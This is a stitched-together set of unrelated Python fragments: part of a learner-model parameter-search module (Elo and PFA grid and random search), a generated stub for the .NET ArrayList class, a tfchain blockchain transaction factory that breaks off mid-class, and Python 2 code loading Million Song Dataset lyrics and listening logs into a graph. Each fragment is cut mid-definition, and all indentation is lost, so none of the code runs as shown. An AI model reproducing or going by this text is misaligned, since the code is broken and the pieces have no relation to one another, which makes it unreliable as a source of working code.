Uses :func:`~matplotlib.pyplot.plot` to plot the data.
:param **kwargs: Key-word arguments passed to the
:func:`~matplotlib.pyplot.plot`.
"""
results = sorted(self.staircases[-1].items(), key=lambda x: x[0])
staircase_times = self.model.metadata['staircase_times']
x_axis = [np.mean(staircase_times[i]) for i in self.intervals]
y_axis = [value for interval, value in results]
xlabel = kwargs.pop('xlabel', 'Time from previous attempt in seconds.')
ylabel = kwargs.pop('ylabel', 'Memory activation')
title = kwargs.pop('title', '')
plot = plt.plot(x_axis, y_axis, '.-', **kwargs)
plt.xscale('log')
plt.title(title)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
return plot
def format_staircases(self, indexes=None):
"""Formats staircase function in a readable way.
:param indexes: Staircases to show (referenced by the index).
`[-1]` formats only the last staircase values. By default,
all staircase values are formated.
"""
indexes = indexes or self.iterations
staircases = [self.staircases[i] for i in indexes]
ranges = sorted([x[1] for x in staircases[0]])
head = ('{:9.0f}' * len(staircases[0])).format(*ranges)
body = ''
for staircase in staircases:
stair = list(sorted(staircase.items(), key=lambda x: x[0]))
body += ('{:+9.3f}' * len(stair)).format(*[v for k, v in stair])
body += '\n'
return '{}\n{}'.format(head, body)
def __repr__(self):
return (
'Iterations: {0}\n'
'Gamma: {1:.5f}\n'
'Delta: {2:.5f}\n'
'Staircase:\n{3}'
).format(
len(self.iterations)-1,
self.best['gamma'],
self.best['delta'],
self.format_staircases([-1])
)
class GridSearch(object):
"""Encapsulates GRID searches for various models.
:param data: Data with answers in a DataFrame.
"""
def __init__(self, data):
self.data = data
def search(self, factory, xvalues, yvalues, **result_kwargs):
"""Performes grid search on ELO model using given parameters.
:param factory: Model facotry which is used to instantiate
model with all the combinations of `xvalues` and `yvalues`.
:type factory: callable
:param xvalues: List of values for first positional argument
passed on to the model factory.
:type xvalues: iterable
:param yvalues: List of values for second positional argument
passed on to the model factory.
:type yvalues: iterable
:param **result_kwargs: Optional arguments passed on to
the :class:`GridResult` instance.
"""
m, n = len(xvalues), len(yvalues)
grid = np.array([[None] * m] * n)
for x, y in itertools.product(range(m), range(n)):
model = factory(xvalues[x], yvalues[y])
test = PerformanceTest(model, self.data)
test.run()
grid[y, x] = test.results['train']
tools.echo('{}/{} {}/{}'.format(x+1, m, y+1, n))
return GridResult(
grid=grid,
xvalues=xvalues,
yvalues=yvalues,
**result_kwargs
)
def search_elo(self, alphas, betas):
"""Performes grid search on ELO model using given parameters.
:param alphas: Alpha parameters (see :class:`EloModel`).
:type alphas: list or :class:`numpy.array`
:param betas: Beta paramters (see :class:`EloModel`).
:type betas: list or :class:`numpy.array`
"""
def elo_factory(x, y):
return EloModel(alpha=x, beta=y)
return self.search(
factory=elo_factory,
xvalues=alphas,
yvalues=betas,
xlabel='alpha',
ylabel='beta',
)
def search_pfae(self, gammas, deltas):
"""Performes grid search on PFA extended model using given parameters.
:param gammas: Gamma parameters (see :class:`PFAExt`).
:type gammas: list or :class:`numpy.array`
:param deltas: Delta paramters (see :class:`PFAExt`).
:type deltas: list or :class:`numpy.array`
"""
def pfae_factory(x, y):
elo = EloModel()
return PFAExt(elo, gamma=x, delta=y)
return self.search(
factory=pfae_factory,
xvalues=gammas,
yvalues=deltas,
xlabel='gammas',
ylabel='deltas',
)
def search_pfas(self, decays, spacings):
"""Performes grid search on PFA extended with spacing and forgetting
using given parameters.
:param decays: Decay rates (see :class:`PFAExtSpacing`).
:type decays: list or :class:`numpy.array`
:param spacings: Spacing rates (see :class:`PFAExtSpacing`).
:type spacings: list or :class:`numpy.array`
"""
def pfas_factory(x, y):
elo = EloModel()
return PFAExtSpacing(elo, decay_rate=x, spacing_rate=y)
return self.search(
factory=pfas_factory,
xvalues=decays,
yvalues=spacings,
xlabel='decay rates',
ylabel='spacing rates',
)
class RandomSearch(object):
"""Encapsulates random searches for various models.
:param data: Data with answers in a DataFrame.
"""
def __init__(self, data):
self.data = data
def search_elo(self, alpha, beta):
"""Performes random search on ELO model using given initial
parameters.
:param alpha: Initial alpha value (see :class:`EloModel`).
:type alpha: float
:param beta: Initial beta value (see :class:`EloModel`).
:type beta: float
"""
def fun(x):
elo = EloModel(alpha=x[0], beta=x[1])
test = PerformanceTest(elo, self.data)
test.run()
tools.echo('alpha={x[0]} beta={x[1]}'.format(x=x))
return test.results['train'].rmse
return optimize.minimize(fun, [alpha, beta])
def search_pfae(self, gamma, delta):
"""Performes random search on ELO model using given initial
parameters.
:param gamma: Initial gamma value (see :class:`PFAExt`).
:type gamma: float
:param delta: Initial delta value (see :class:`PFAExt`).
:type delta: float
"""
elo = EloModel()
def fun(x):
pfae = PFAExt(elo, gamma=x[0], delta=x[1])
test = PerformanceTest(pfae, self.data)
test.run()
tools.echo('gamma={x[0]} delta={x[1]}'.format(x=x))
return test.results['train'].rmse
return optimize.minimize(fun, [gamma, delta])
class NaiveDescent(object):
"""Encapsulates the modified gradient descent (which is not in fact
based on the partial derivatives of a function) for various models.
Note that this method doesn't really work even when the number of
parameters is very small (like two parameters small).
:param data: Data with answers in a DataFrame.
"""
def __init__(self, data):
self.data = data
def search(self, model_fun, parameters,
step_size=1, precision=0.01, maxiter=50):
"""Finds optimal parameters for given model.
:param model_fun: Callable that trains the model on the given
parameters.
:param | |
<gh_stars>0
# encoding: utf-8
# module System.Collections calls itself Collections
# from mscorlib,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089
# by generator 1.145
# no doc
# no important
# no functions
# classes
class ArrayList(object):
"""
Implements the System.Collections.IList interface using an array whose size is dynamically increased as required.
ArrayList()
ArrayList(capacity: int)
ArrayList(c: ICollection)
"""
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return ArrayList()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
@staticmethod
def Adapter(list):
"""
Adapter(list: IList) -> ArrayList
Creates an System.Collections.ArrayList wrapper for a specific System.Collections.IList.
list: The System.Collections.IList to wrap.
Returns: The System.Collections.ArrayList wrapper around the System.Collections.IList.
"""
pass
def Add(self,value):
"""
Add(self: ArrayList,value: object) -> int
Adds an object to the end of the System.Collections.ArrayList.
value: The System.Object to be added to the end of the System.Collections.ArrayList. The value can be null.
Returns: The System.Collections.ArrayList index at which the value has been added.
"""
pass
def AddRange(self,c):
"""
AddRange(self: ArrayList,c: ICollection)
Adds the elements of an System.Collections.ICollection to the end of the System.Collections.ArrayList.
c: The System.Collections.ICollection whose elements should be added to the end of the System.Collections.ArrayList. The collection itself cannot be null,but it can contain
elements that are null.
"""
pass
def BinarySearch(self,*__args):
"""
BinarySearch(self: ArrayList,index: int,count: int,value: object,comparer: IComparer) -> int
Searches a range of elements in the sorted System.Collections.ArrayList for an element using the specified comparer and returns the zero-based index of the element.
index: The zero-based starting index of the range to search.
count: The length of the range to search.
value: The System.Object to locate. The value can be null.
comparer: The System.Collections.IComparer implementation to use when comparing elements.-or- null to use the default comparer that is the System.IComparable implementation of each
element.
Returns: The zero-based index of value in the sorted System.Collections.ArrayList,if value is found; otherwise,a negative number,which is the bitwise complement of the index of
the next element that is larger than value or,if there is no larger element,the bitwise complement of System.Collections.ArrayList.Count.
BinarySearch(self: ArrayList,value: object) -> int
Searches the entire sorted System.Collections.ArrayList for an element using the default comparer and returns the zero-based index of the element.
value: The System.Object to locate. The value can be null.
Returns: The zero-based index of value in the sorted System.Collections.ArrayList,if value is found; otherwise,a negative number,which is the bitwise complement of the index of
the next element that is larger than value or,if there is no larger element,the bitwise complement of System.Collections.ArrayList.Count.
BinarySearch(self: ArrayList,value: object,comparer: IComparer) -> int
Searches the entire sorted System.Collections.ArrayList for an element using the specified comparer and returns the zero-based index of the element.
value: The System.Object to locate. The value can be null.
comparer: The System.Collections.IComparer implementation to use when comparing elements.-or- null to use the default comparer that is the System.IComparable implementation of each
element.
Returns: The zero-based index of value in the sorted System.Collections.ArrayList,if value is found; otherwise,a negative number,which is the bitwise complement of the index of
the next element that is larger than value or,if there is no larger element,the bitwise complement of System.Collections.ArrayList.Count.
"""
pass
def Clear(self):
"""
Clear(self: ArrayList)
Removes all elements from the System.Collections.ArrayList.
"""
pass
def Clone(self):
"""
Clone(self: ArrayList) -> object
Creates a shallow copy of the System.Collections.ArrayList.
Returns: A shallow copy of the System.Collections.ArrayList.
"""
pass
def Contains(self,item):
"""
Contains(self: ArrayList,item: object) -> bool
Determines whether an element is in the System.Collections.ArrayList.
item: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
Returns: true if item is found in the System.Collections.ArrayList; otherwise,false.
"""
pass
def CopyTo(self,*__args):
"""
CopyTo(self: ArrayList,array: Array)
Copies the entire System.Collections.ArrayList to a compatible one-dimensional System.Array,starting at the beginning of the target array.
array: The one-dimensional System.Array that is the destination of the elements copied from System.Collections.ArrayList. The System.Array must have zero-based indexing.
CopyTo(self: ArrayList,array: Array,arrayIndex: int)
Copies the entire System.Collections.ArrayList to a compatible one-dimensional System.Array,starting at the specified index of the target array.
array: The one-dimensional System.Array that is the destination of the elements copied from System.Collections.ArrayList. The System.Array must have zero-based indexing.
arrayIndex: The zero-based index in array at which copying begins.
CopyTo(self: ArrayList,index: int,array: Array,arrayIndex: int,count: int)
Copies a range of elements from the System.Collections.ArrayList to a compatible one-dimensional System.Array,starting at the specified index of the target array.
index: The zero-based index in the source System.Collections.ArrayList at which copying begins.
array: The one-dimensional System.Array that is the destination of the elements copied from System.Collections.ArrayList. The System.Array must have zero-based indexing.
arrayIndex: The zero-based index in array at which copying begins.
count: The number of elements to copy.
"""
pass
@staticmethod
def FixedSize(list):
"""
FixedSize(list: IList) -> IList
Returns an System.Collections.IList wrapper with a fixed size.
list: The System.Collections.IList to wrap.
Returns: An System.Collections.IList wrapper with a fixed size.
FixedSize(list: ArrayList) -> ArrayList
Returns an System.Collections.ArrayList wrapper with a fixed size.
list: The System.Collections.ArrayList to wrap.
Returns: An System.Collections.ArrayList wrapper with a fixed size.
"""
pass
def GetEnumerator(self,index=None,count=None):
"""
GetEnumerator(self: ArrayList) -> IEnumerator
Returns an enumerator for the entire System.Collections.ArrayList.
Returns: An System.Collections.IEnumerator for the entire System.Collections.ArrayList.
GetEnumerator(self: ArrayList,index: int,count: int) -> IEnumerator
Returns an enumerator for a range of elements in the System.Collections.ArrayList.
index: The zero-based starting index of the System.Collections.ArrayList section that the enumerator should refer to.
count: The number of elements in the System.Collections.ArrayList section that the enumerator should refer to.
Returns: An System.Collections.IEnumerator for the specified range of elements in the System.Collections.ArrayList.
"""
pass
def GetRange(self,index,count):
"""
GetRange(self: ArrayList,index: int,count: int) -> ArrayList
Returns an System.Collections.ArrayList which represents a subset of the elements in the source System.Collections.ArrayList.
index: The zero-based System.Collections.ArrayList index at which the range starts.
count: The number of elements in the range.
Returns: An System.Collections.ArrayList which represents a subset of the elements in the source System.Collections.ArrayList.
"""
pass
def IndexOf(self,value,startIndex=None,count=None):
"""
IndexOf(self: ArrayList,value: object) -> int
Searches for the specified System.Object and returns the zero-based index of the first occurrence within the entire System.Collections.ArrayList.
value: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
Returns: The zero-based index of the first occurrence of value within the entire System.Collections.ArrayList,if found; otherwise,-1.
IndexOf(self: ArrayList,value: object,startIndex: int) -> int
Searches for the specified System.Object and returns the zero-based index of the first occurrence within the range of elements in the System.Collections.ArrayList that
extends from the specified index to the last element.
value: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
startIndex: The zero-based starting index of the search. 0 (zero) is valid in an empty list.
Returns: The zero-based index of the first occurrence of value within the range of elements in the System.Collections.ArrayList that extends from startIndex to the last element,if
found; otherwise,-1.
IndexOf(self: ArrayList,value: object,startIndex: int,count: int) -> int
Searches for the specified System.Object and returns the zero-based index of the first occurrence within the range of elements in the System.Collections.ArrayList that
starts at the specified index and contains the specified number of elements.
value: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
startIndex: The zero-based starting index of the search. 0 (zero) is valid in an empty list.
count: The number of elements in the section to search.
Returns: The zero-based index of the first occurrence of value within the range of elements in the System.Collections.ArrayList that starts at startIndex and contains count number
of elements,if found; otherwise,-1.
"""
pass
def Insert(self,index,value):
"""
Insert(self: ArrayList,index: int,value: object)
Inserts an element into the System.Collections.ArrayList at the specified index.
index: The zero-based index at which value should be inserted.
value: The System.Object to insert. The | |
"""
Module contianing all transaction types
"""
from JumpscaleLib.clients.blockchain.rivine.types.signatures import Ed25519PublicKey
from JumpscaleLib.clients.blockchain.rivine.types.unlockconditions import SingleSignatureFulfillment, UnlockHashCondition,\
LockTimeCondition, AtomicSwapCondition, AtomicSwapFulfillment, MultiSignatureCondition, FulfillmentFactory, UnlockCondtionFactory, MultiSignatureFulfillment
from JumpscaleLib.clients.blockchain.rivine.encoding import binary
from JumpscaleLib.clients.blockchain.rivine.utils import hash
from JumpscaleLib.clients.blockchain.rivine.types.unlockhash import UnlockHash
from JumpscaleLib.clients.blockchain.rivine.secrets import token_bytes
from JumpscaleLib.clients.blockchain.rivine.const import HASTINGS_TFT_VALUE
from JumpscaleLib.clients.blockchain.tfchain.encoding import binary as tfbinary
from JumpscaleLib.clients.blockchain.tfchain.types import network as tftnet
from JumpscaleLib.clients.blockchain.tfchain.types import signatures as tftsig
from JumpscaleLib.clients.blockchain.tfchain import const as tfconst
from enum import Enum
import base64
import json
LEGACY_TRANSACTION_VERSION = 0
DEFAULT_TRANSACTION_VERSION = 1
MINTERDEFINITION_TRANSACTION_VERSION = 128
COINCREATION_TRANSACTION_VERSION = 129
BOT_REGISTRATION_TRANSACTION_VERSION = 144
BOT_RECORD_UPDATE_TRANSACTION_VERSION = 145
BOT_NAME_TRANSFER_TRANSACTION_VERSION = 146
ERC20_CONVERSION_TRANSACTION_VERSION = 208
ERC20_COIN_CREATION_TRANSACTION_VERSION = 209
ERC20_ADDRESS_REGISTRATION_TRANSACTION_VERSION = 210
HASHTYPE_COINOUTPUT_ID = 'coinoutputid'
DEFAULT_MINERFEE = 100000000
class TransactionFactory:
"""
A transaction factory class
"""
@staticmethod
def create_transaction(version):
"""
Creates and return a transaction of the speicfied verion
@param version: Version of the transaction
"""
if version == 1:
return TransactionV1()
@staticmethod
def from_json(txn_json):
"""
Creates a new transaction object from a json formated string
@param txn_json: JSON string, representing a transaction
"""
txn_dict = json.loads(txn_json)
return TransactionFactory.from_dict(txn_dict)
@staticmethod
def from_dict(txn_dict):
"""
Creates a new transaction object from a raw (JSON-decoded) dict.
@param from_dict: dictionary, representing a raw transaction, as decoded from a JSON object.
"""
if 'version' not in txn_dict:
return None
if txn_dict['version'] == DEFAULT_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in Default Transaction (v{})".format(DEFAULT_TRANSACTION_VERSION))
txn = TransactionV1()
txn_data = txn_dict['data']
if 'coininputs' in txn_data:
for ci_info in (txn_data['coininputs'] or []):
ci = CoinInput.from_dict(ci_info)
txn._coin_inputs.append(ci)
if 'coinoutputs' in txn_data:
for co_info in (txn_data['coinoutputs'] or []):
co = CoinOutput.from_dict(co_info)
txn._coin_outputs.append(co)
if 'minerfees' in txn_data:
for minerfee in (txn_data['minerfees'] or []) :
txn.add_minerfee(int(minerfee))
if 'arbitrarydata' in txn_data:
txn._data = base64.b64decode(txn_data['arbitrarydata'])
return txn
if txn_dict['version'] == LEGACY_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in Legacy Transaction (v{})".format(LEGACY_TRANSACTION_VERSION))
txn = TransactionV1() # parse as v1 transaction, converting the coin inputs and outputs
txn_data = txn_dict['data']
if 'coininputs' in txn_data:
for legacy_ci_info in (txn_data['coininputs'] or []):
unlocker = legacy_ci_info.get('unlocker', {})
ci_info = {
'parentid': legacy_ci_info.get('parentid', ''),
'fulfillment': {
'type': 1, # TODO: support legacy atomic swap fulfillments
'data': {
'publickey': unlocker.get('condition', {}).get('publickey'),
'signature': unlocker.get('fulfillment', {}).get('signature'),
}
}
}
ci = CoinInput.from_dict(ci_info)
txn._coin_inputs.append(ci)
if 'coinoutputs' in txn_data:
for legacy_co_info in (txn_data['coinoutputs'] or []):
co_info = {
'value': legacy_co_info.get('value', '0'),
'condition': {
'type': 1, # TODO: support legacy atomic swap conditions
'data': {
'unlockhash': legacy_co_info.get('unlockhash', ''),
}
}
}
co = CoinOutput.from_dict(co_info)
txn._coin_outputs.append(co)
if 'minerfees' in txn_data:
for minerfee in (txn_data['minerfees'] or []) :
txn.add_minerfee(int(minerfee))
if 'arbitrarydata' in txn_data:
txn._data = base64.b64decode(txn_data['arbitrarydata'])
return txn
if txn_dict['version'] == MINTERDEFINITION_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in MinterDefinition Transaction")
txn = TransactionV128()
txn_data = txn_dict['data']
if 'nonce' in txn_data:
txn._nonce = base64.b64decode(txn_data['nonce'])
if 'mintcondition' in txn_data:
txn._mint_condition = UnlockCondtionFactory.from_dict(txn_data['mintcondition'])
if 'mintfulfillment' in txn_data:
txn._mint_fulfillment = FulfillmentFactory.from_dict(txn_data['mintfulfillment'])
if 'minerfees' in txn_data:
for minerfee in txn_data['minerfees']:
txn.add_minerfee(int(minerfee))
if 'arbitrarydata' in txn_data:
txn._data = base64.b64decode(txn_data['arbitrarydata'])
return txn
if txn_dict['version'] == COINCREATION_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in CoinCreation Transaction")
txn = TransactionV129()
txn_data = txn_dict['data']
if 'nonce' in txn_data:
txn._nonce = base64.b64decode(txn_data['nonce'])
if 'mintfulfillment' in txn_data:
txn._mint_fulfillment = FulfillmentFactory.from_dict(txn_data['mintfulfillment'])
if 'coinoutputs' in txn_data:
for co_info in txn_data['coinoutputs']:
co = CoinOutput.from_dict(co_info)
txn._coin_outputs.append(co)
if 'minerfees' in txn_data:
for minerfee in txn_data['minerfees']:
txn.add_minerfee(int(minerfee))
if 'arbitrarydata' in txn_data:
txn._data = base64.b64decode(txn_data['arbitrarydata'])
return txn
if txn_dict['version'] == BOT_REGISTRATION_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in BotRegistration Transaction")
txn = TransactionV144()
txn.from_dict(txn_dict['data'])
return txn
if txn_dict['version'] == BOT_RECORD_UPDATE_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in BotRecordUpdate Transaction")
txn = TransactionV145()
txn.from_dict(txn_dict['data'])
return txn
if txn_dict['version'] == BOT_NAME_TRANSFER_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in BotNameTransfer Transaction")
txn = TransactionV146()
txn.from_dict(txn_dict['data'])
return txn
if txn_dict['version'] == ERC20_CONVERSION_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in ERC20 Conversion Transaction")
txn = TransactionV208()
txn.from_dict(txn_dict['data'])
return txn
if txn_dict['version'] == ERC20_COIN_CREATION_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in ERC20 CoinCreation Transaction")
txn = TransactionV209()
txn.from_dict(txn_dict['data'])
return txn
if txn_dict['version'] == ERC20_ADDRESS_REGISTRATION_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in ERC20 AddressRegistration Transaction")
txn = TransactionV210()
txn.from_dict(txn_dict['data'])
return txn
class TransactionV1:
"""
A Transaction is an atomic component of a block. Transactions can contain
inputs and outputs and even arbitrar data. They can also contain signatures to prove that a given party has
approved the transaction, or at least a particular subset of it.
Transactions can depend on other previous transactions in the same block,
but transactions cannot spend outputs that they create or otherwise beself-dependent.
"""
def __init__(self):
"""
Initializes a new tansaction
"""
self._coin_inputs = []
self._blockstakes_inputs = []
self._coin_outputs = []
self._blockstakes_outputs = []
self._minerfees = []
self._data = bytearray()
self._version = bytearray([1])
self._id = None
@property
def version(self):
return 1
@property
def id(self):
"""
Gets transaction id
"""
return self._id
@id.setter
def id(self, txn_id):
"""
Sets transaction id
"""
self._id = txn_id
@property
def coin_inputs(self):
"""
Retrieves coins inputs
"""
return self._coin_inputs or []
@property
def coin_outputs(self):
"""
Retrieves coins outputs
"""
return self._coin_outputs or []
@property
def data(self):
"""
Gets the arbitrary data
"""
return self._data
@property
def json(self):
"""
Returns a json version of the TransactionV1 object
"""
result = {
'version': self.version,
'data': {
'coininputs': [input.json for input in self._coin_inputs],
'coinoutputs': [output.json for output in self._coin_outputs],
'minerfees': [str(fee) for fee in self._minerfees]
}
}
if self._data:
result['data']['arbitrarydata'] = base64.b64encode(self._data).decode('utf-8')
return result
def add_data(self, data):
"""
Add data to the transaction
"""
self._data.extend(data)
def add_coin_input(self, parent_id, pub_key):
"""
Adds a new input to the transaction
"""
key = Ed25519PublicKey(pub_key=pub_key)
fulfillment = SingleSignatureFulfillment(pub_key=key)
self._coin_inputs.append(CoinInput(parent_id=parent_id, fulfillment=fulfillment))
def add_atomicswap_input(self, parent_id, pub_key, secret=None):
"""
Adds a new atomicswap input to the transaction
An atomicswap input can be for refund or redeem purposes, if for refund no secret is needed, but if for redeem then
a secret needs tp be provided
"""
key = Ed25519PublicKey(pub_key=pub_key)
fulfillment = AtomicSwapFulfillment(pub_key=key, secret=secret)
self._coin_inputs.append(CoinInput(parent_id=parent_id, fulfillment=fulfillment))
def add_multisig_input(self, parent_id):
"""
Adds a new coin input with an empty MultiSignatureFulfillment
"""
fulfillment = MultiSignatureFulfillment()
self._coin_inputs.append(CoinInput(parent_id=parent_id, fulfillment=fulfillment))
def add_coin_output(self, value, recipient, locktime=None):
"""
Add a new coin output to the transaction
@param value: Amout of coins
@param recipient: The recipient address
@param locktime: If provided then a locktimecondition will be created for this output
"""
unlockhash = UnlockHash.from_string(recipient)
condition = UnlockHashCondition(unlockhash=unlockhash)
if locktime is not None:
condition = LockTimeCondition(condition=condition, locktime=locktime)
self._coin_outputs.append(CoinOutput(value=value, condition=condition))
def add_atomicswap_output(self, value, recipient, locktime, refund_address, hashed_secret):
"""
Add a new atomicswap output to the transaction
"""
condition = AtomicSwapCondition(sender=refund_address, reciever=recipient,
hashed_secret=hashed_secret, locktime=locktime)
coin_output = CoinOutput(value=value, condition=condition)
self._coin_outputs.append(coin_output)
return coin_output
def add_multisig_output(self, value, unlockhashes, min_nr_sig, locktime=None):
"""
Add a new MultiSignature output to the transaction
@param value: Value of the output in hastings
@param unlockhashes: List of all unlock hashes which are authorised to spend this output by signing off
@param min_nr_sig: Defines the amount of signatures required in order to spend this output
@param locktime: If provided then a locktimecondition will be created for this output
"""
condition = MultiSignatureCondition(unlockhashes=unlockhashes,
min_nr_sig=min_nr_sig)
if locktime is not None:
condition = LockTimeCondition(condition=condition, locktime=locktime)
coin_output = CoinOutput(value=value, condition=condition)
self._coin_outputs.append(coin_output)
return coin_output
def add_minerfee(self, minerfee):
"""
Adds a minerfee to the transaction
"""
self._minerfees.append(minerfee)
def get_input_signature_hash(self, extra_objects=None):
"""
Builds a signature hash for an input
"""
if extra_objects is None:
extra_objects = []
buffer = bytearray()
# encode the transaction version
buffer.extend(self._version)
# encode extra objects if exists
for extra_object in extra_objects:
buffer.extend(binary.encode(extra_object))
# encode the number of coins inputs
buffer.extend(binary.encode(len(self._coin_inputs)))
# encode inputs parent_ids
for coin_input in self._coin_inputs:
buffer.extend(binary.encode(coin_input.parent_id, type_='hex'))
# encode coin outputs
buffer.extend(binary.encode(self._coin_outputs, type_='slice'))
# encode the number of blockstakes
buffer.extend(binary.encode(len(self._blockstakes_inputs)))
# encode blockstack inputs parent_ids
for bs_input in self._blockstakes_inputs:
buffer.extend(binary.encode(bs_input.parent_id, type_='hex'))
# encode blockstake outputs
buffer.extend(binary.encode(self._blockstakes_outputs, type_='slice'))
# encode miner fees
buffer.extend(binary.encode(len(self._minerfees)))
for miner_fee in self._minerfees:
buffer.extend(binary.encode(miner_fee, type_='currency'))
# encode custom data_
buffer.extend(binary.encode(self._data, type_='slice'))
# now we need to return the hash value of the binary array
# return bytes(buffer)
return hash(data=buffer)
class TransactionV128:
| |
x[2:]), elements)
processed_pairs = imap(lambda x: (x[0], dict(
imap(lambda x: list(imap(int, x.split(u":"))), x[1]))), pairs)
tid_lyric_pairs_train = list(processed_pairs)
f = open(u"/data/jeffrey82221/MSD_Lyrics/mxm_dataset_test.txt")
lines = ifilter(lambda x: x[0] != u'#' and x[0] != u'%', f)
elements = imap(lambda x: x.replace(u"\n", u"").split(u","), lines)
pairs = imap(lambda x: (x[0], x[2:]), elements)
processed_pairs = imap(lambda x: (x[0], dict(
imap(lambda x: list(imap(int, x.split(u":"))), x[1]))), pairs)
tid_lyric_pairs_test = list(processed_pairs)
tid_lyric_pairs = tid_lyric_pairs_train + tid_lyric_pairs_test
f = open("/data/jeffrey82221/MSD_Lyrics/mxm_dataset_test.txt")
self.word_list = next(it.islice(f, 17, None)).split(',')
self.word_list[0] = 'i'
self.tid_list = map(lambda x: x[0], tid_lyric_pairs)
print "Lyrics Info LOAD"
# add tid_list and word_list into graph
# build sparse matrix base on this tid to word count dict
# add vertices
self.G = Graph()
self.G.add_vertices(len(self.tid_list + self.word_list))
self.G.vs['name'] = self.tid_list + self.word_list
# add edge:
name_id_matcher = dict(
zip(self.tid_list + self.word_list, range(len(self.tid_list + self.word_list))))
def song_word_edgelist_generator(tid_lyric_pairs):
for song_id in range(len(tid_lyric_pairs)):
for word_id, term_frequency in tid_lyric_pairs[song_id][1].items():
yield tid_lyric_pairs[song_id][0], self.word_list[word_id - 1], term_frequency
edgelist_generator = song_word_edgelist_generator(tid_lyric_pairs)
graph_edgelist_generator = imap(lambda x: (
name_id_matcher[x[0]], name_id_matcher[x[1]]), edgelist_generator) # match tids and word_list to number
self.G.add_edges(list(graph_edgelist_generator))
# add weights to edges :
self.G.es['weight'] = list(
imap(lambda x: x[2], song_word_edgelist_generator(tid_lyric_pairs)))
print "Graph Build"
'''
def load_lyrics_info(self, fix_tid_list):
f = open(u"/data/jeffrey82221/MSD_Lyrics/mxm_dataset_train.txt")
lines = ifilter(lambda x: x[0] != u'#' and x[0] != u'%', f)
elements = imap(lambda x: x.replace(u"\n", u"").split(u","), lines)
pairs = imap(lambda x: (x[0], x[2:]), elements)
tid_lyric_pairs_train = imap(lambda x: (x[0], dict(
imap(lambda x: list(imap(int, x.split(u":"))), x[1]))), pairs)
#tid_lyric_pairs_train = list(processed_pairs)
f = open(u"/data/jeffrey82221/MSD_Lyrics/mxm_dataset_test.txt")
lines = ifilter(lambda x: x[0] != u'#' and x[0] != u'%', f)
elements = imap(lambda x: x.replace(u"\n", u"").split(u","), lines)
pairs = imap(lambda x: (x[0], x[2:]), elements)
tid_lyric_pairs_test = imap(lambda x: (x[0], dict(
imap(lambda x: list(imap(int, x.split(u":"))), x[1]))), pairs)
#tid_lyric_pairs_test = list(processed_pairs)
tid_lyric_pairs = it.chain(tid_lyric_pairs_train, tid_lyric_pairs_test)
tid_lyric_table = pd.DataFrame.from_records(
tid_lyric_pairs, columns=['tid', 'lyrics'])
tid_lyric_table = tid_lyric_table.set_index('tid')
print "tid lyric info load"
if fix_tid_list != None:
tid_lyric_table = tid_lyric_table.loc[fix_tid_list]
print "FIX TID DONE"
print u"lyrics file load"
tid_lyric_pairs_left, tid_lyric_pairs_right = it.tee(
tid_lyric_table.reset_index("tid").itertuples(index=False))
lyrics = imap(lambda x: x[1], tid_lyric_pairs_right)
lyric_id_list = imap(lambda x: list(
it.chain(*list(imap(lambda k_v: [k_v[0]] * k_v[1], x.items())))), lyrics)
tfidf_vectorizer = TfidfVectorizer(ngram_range=(
1, 1), preprocessor=lambda x: x, tokenizer=lambda x: x)
self.matrix = tfidf_vectorizer.fit_transform(
lyric_id_list) # user word matrix
if reduced_dimension != None:
self.matrix = self.Dimension_Reduction(
self.matrix, reduced_dimension)
self.tid_list = list(imap(lambda x: x[0], tid_lyric_pairs_left))
self.tid_song_id_table = pd.DataFrame(
[(v, i) for i, v in enumerate(self.tid_list)], columns=['tid', 'id'])
self.tid_song_id_table = self.tid_song_id_table.set_index('tid')
print u"lyrics tfidf matrix build"
# 1. tid_song_id_table
# 2. tid_list
'''
def load_listen_network(self):
self.G = Graph.Read_Ncol(
"/data/jeffrey82221/MSD_Taste/train_triplets.txt", names=True, directed=False, weights=True)
# rematch names to tids
print "Graph LOAD"
f = open("/data/jeffrey82221/MSD_Taste/unique_tracks.txt")
elements = imap(lambda x: x.replace("\n", "").split("<SEP>"), f)
track_id_table = pd.DataFrame.from_records(
elements, columns=[u'tid', u'echoid', u'artist', u'title'])
track_id_table = track_id_table.set_index('echoid')
node_names = self.G.vs['name']
tmp_tid_list = filter(lambda x: x[1][0] == 'S', enumerate(node_names))
self.tid_list = list(
track_id_table.loc[map(lambda x:x[1], tmp_tid_list)].tid)
self.G.vs[map(lambda x:x[0], tmp_tid_list)]['name']=self.tid_list
print "Graph Track id Replaced"
'''
def load_listen_info(self, fix_tid_list):
f = open(u"/data/jeffrey82221/MSD_Taste/unique_tracks.txt")
elements = imap(lambda x: x.replace(u"\n", u"").split(u"<SEP>"), f)
track_id_table = pd.DataFrame.from_records(
elements, columns=[u'tid', u'echoid', u'artist', u'title'])
print "track info load"
f = open(u"/data/jeffrey82221/MSD_Taste/train_triplets.txt")
listening_log_table = pd.read_csv(
u"/data/jeffrey82221/MSD_Taste/train_triplets.txt", sep=u"\t", header=None)
listening_log_table.columns = [u'user', u'echoid', u'count']
listening_log_table = listening_log_table.merge(
track_id_table, on='echoid') # match tid to echo id , (an echoid can have multiple tids) => user ~ echoid ~ count => user ~ echoid ~ tids ~ count =>
# reduce using tids
print "listening log load"
if fix_tid_list != None:
listening_log_table = listening_log_table.set_index(
'tid').loc[fix_tid_list].reset_index('tid')
